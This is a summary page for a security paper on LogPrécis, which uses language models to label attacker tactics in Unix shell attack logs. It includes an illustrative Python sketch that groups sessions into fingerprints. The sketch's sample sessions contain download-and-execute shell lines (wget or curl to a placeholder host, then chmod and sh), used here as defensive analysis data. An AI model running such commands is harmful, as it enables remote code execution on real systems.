LogPrécis: Unleashing Language Models for Automated Malicious Log Analysis

Matteo Boffa; Rodolfo Vieira Valentim; Luca Vassio; Danilo Giordano; Idilio Drago; Marco Mellia; Zied Ben Houidi

arXiv:2307.08309·cs.CR·March 25, 2024

TL;DR

LogPrécis leverages advanced language models to automatically analyze and categorize large volumes of Unix shell attack logs, aiding cybersecurity experts in understanding attack sequences, detecting new threats, and improving defense strategies.

Contribution

This paper introduces LogPrécis, a novel methodology that uses language models to automatically interpret and abstract malicious shell logs, significantly reducing data complexity and enhancing attack analysis capabilities.

Findings

1. Successfully processed 400,000 attack sessions into 3,000 fingerprints
2. Enabled better understanding and tracking of attack sequences and mutations
3. Open-sourced the LogPrécis tool for community use

Abstract

The collection of security-related logs holds the key to understanding attack behaviors and diagnosing vulnerabilities. Still, their analysis remains a daunting challenge. Recently, Language Models (LMs) have demonstrated unmatched potential in understanding natural and programming languages. The question arises whether and how LMs could also be useful for security experts, since their logs contain intrinsically confused and obfuscated information. In this paper, we systematically study how to benefit from the state of the art in LMs to automatically analyze text-like Unix shell attack logs. We present a thorough design methodology that leads to LogPrécis. It receives raw shell sessions as input and automatically identifies and assigns the attacker tactic to each portion of the session, i.e., unveiling the sequence of the attacker's goals. We demonstrate LogPrécis' capability to…
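
To make the idea of turning sessions into tactic sequences concrete, here is a minimal sketch of how per-statement tactic labels could collapse several sessions into a smaller set of fingerprints. Everything in it is an assumption for illustration: the keyword lookup `toy_tactic` stands in for the language model, the tactic names are placeholders, the naive split on `;` replaces real shell parsing, and collapsing consecutive repeats is one plausible way to build a fingerprint, not necessarily the definition used in the paper.

```python
from collections import Counter
from itertools import groupby


def split_statements(session: str) -> list[str]:
    """Naively split a shell session on ';' (real sessions need a proper shell parser)."""
    return [part.strip() for part in session.split(";") if part.strip()]


def toy_tactic(statement: str) -> str:
    """Hypothetical stand-in for the model: a keyword lookup on the first token."""
    command = statement.split()[0]
    if command in {"uname", "whoami", "cat", "ls"}:
        return "Discovery"
    if command in {"wget", "curl", "chmod", "sh"}:
        return "Execution"
    return "Other"


def fingerprint(session: str) -> tuple[str, ...]:
    """Label each statement, then collapse runs of the same tactic into one entry."""
    tactics = [toy_tactic(statement) for statement in split_statements(session)]
    return tuple(tactic for tactic, _ in groupby(tactics))


# Made-up sessions for illustration only.
sessions = [
    "uname -a; whoami; wget http://example.invalid/a.sh; chmod +x a.sh; sh a.sh",
    "cat /proc/cpuinfo; curl -O http://example.invalid/b.sh; sh b.sh",
    "ls -la; echo done",
]

# Sessions with different commands but the same tactic sequence share a fingerprint.
counts = Counter(fingerprint(session) for session in sessions)
for tactic_sequence, n_sessions in counts.items():
    print(" > ".join(tactic_sequence), n_sessions)
```

In this toy input the first two sessions use different commands yet map to the same tactic sequence, which is the kind of reduction that lets many raw sessions be summarized by far fewer fingerprints.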

Code & Models

Repositories

smartdata-polito/logprecis
PyTorch · Official

Taxonomy

Topics: Software System Performance and Reliability · Software Engineering Research · Network Security and Intrusion Detection